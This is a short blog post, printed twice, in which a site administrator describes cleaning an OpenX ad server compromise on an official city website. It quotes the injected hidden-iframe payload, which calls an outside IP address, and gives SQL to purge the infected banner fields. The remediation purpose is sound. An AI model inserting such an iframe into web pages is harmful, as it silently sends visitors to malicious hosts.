I hit me cold when I saw the virus-scanner’s red message was jumping on the screen. Administering www.weimar.de it is no fun, having a virus-warning on the frontpage of an official website.
The reason was OpenX, Version 2.8.1. which I updated to 2.8.5. – which seemed too late since the database was affected. I got this code within my banner-js:
<"+"iframe src=\"http://194.8.250.211/tds/in.cgi?default\" width=\"1\" height=\"1\" hspace=\"0\" vspace=\"0\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>
Checking all php-files (no, actually most important these three:
- /var/yourdomain.conf.php
- /adjs.php
- /www/delivery/ajs.php
)
I found nothing. Check it anyway, because in some cases it’s a direct hack within those files (at the very beginning or the end).
So I checked my database , the table phpads_banners (or openx_banners) and found nothing obvious. The malicious code is hidden within the BLOB-fields (which content you can only see if enabled within myPhpAdmin) and therefore there’s one thing you can do: Set the fields:
- prepend
- append
- html_cache
- html_template
empty!
I rigourously cleared out all the sh*t by doing this simple statement:
UPDATE `my_db`.`phpads_banners` SET `append` = NULL,`prepend` = NULL,`htmltemplate` = NULL, `htmlcache` = NULL WHERE 1;
Good luck!I hit me cold when I saw the virus-scanner’s red message was jumping on the screen. Administering www.weimar.de it is no fun, having a virus-warning on the frontpage of an official website.
The reason was OpenX, Version 2.8.1. which I updated to 2.8.5. – which seemed too late since the database was affected. I got this code within my banner-js:
<"+"iframe src=\"http://194.8.250.211/tds/in.cgi?default\" width=\"1\" height=\"1\" hspace=\"0\" vspace=\"0\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>
Checking all php-files (no, actually most important these three:
- /var/yourdomain.conf.php
- /adjs.php
- /www/delivery/ajs.php
)
I found nothing. Check it anyway, because in some cases it’s a direct hack within those files (at the very beginning or the end).
So I checked my database , the table phpads_banners (or openx_banners) and found nothing obvious. The malicious code is hidden within the BLOB-fields (which content you can only see if enabled within myPhpAdmin) and therefore there’s one thing you can do: Set the fields:
- prepend
- append
- html_cache
- html_template
empty!
I rigourously cleared out all the sh*t by doing this simple statement:
UPDATE `web2_db5`.`phpads_banners` SET `append` = NULL,`prepend` = NULL,`htmltemplate` = NULL, `htmlcache` = NULL WHERE 1;
Good luck!